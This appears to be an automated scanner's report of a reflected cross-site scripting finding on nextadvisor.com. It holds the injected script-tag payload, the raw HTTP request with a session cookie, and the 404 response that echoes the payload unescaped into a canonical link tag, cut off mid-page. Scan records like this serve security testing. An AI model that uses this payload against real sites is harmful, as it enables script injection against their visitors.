http://www.nextadvisor.com/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000414)%3C/s..

Parameters

Parameter: URI-BASED
Type: Raw URI
Value: '"--></style></script><script>alert(0x000414)</script>

Request

GET /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000414)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/images/favicon.ico
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:00:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3523
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/images/'"--></style></script><script>netsparker(0x000414)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(lin